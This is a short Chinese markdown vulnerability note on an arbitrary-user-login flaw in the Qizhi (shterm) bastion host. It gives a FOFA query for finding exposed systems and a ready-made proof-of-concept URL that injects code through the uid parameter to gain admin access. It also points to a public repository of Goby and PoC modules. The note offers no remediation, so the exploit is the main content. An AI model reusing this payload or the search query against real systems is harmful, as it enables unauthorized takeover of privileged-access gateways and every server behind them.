齐治堡垒机任意用户登录漏洞.md

1.05 KB / 2021-07-04 06:01:08
    # 齐治堡垒机 任意用户登录漏洞

## 漏洞描述

齐治堡垒机 存在任意用户登录漏洞，访问特定的Url即可获得后台权限

## 漏洞影响

> [!NOTE]
>
> 齐治堡垒机

## FOFA

> [!NOTE]
>
> app="齐治科技-堡垒机"

## 漏洞复现

漏洞POC为

```
http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
```

![](http://wikioss.peiqi.tech/vuln/qz-1.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

## Goby & POC

> [!NOTE]
>
> 已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
>
> shterm(QiZhi) Fortress Arbitrary User Login

![](http://wikioss.peiqi.tech/vuln/qz-2.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)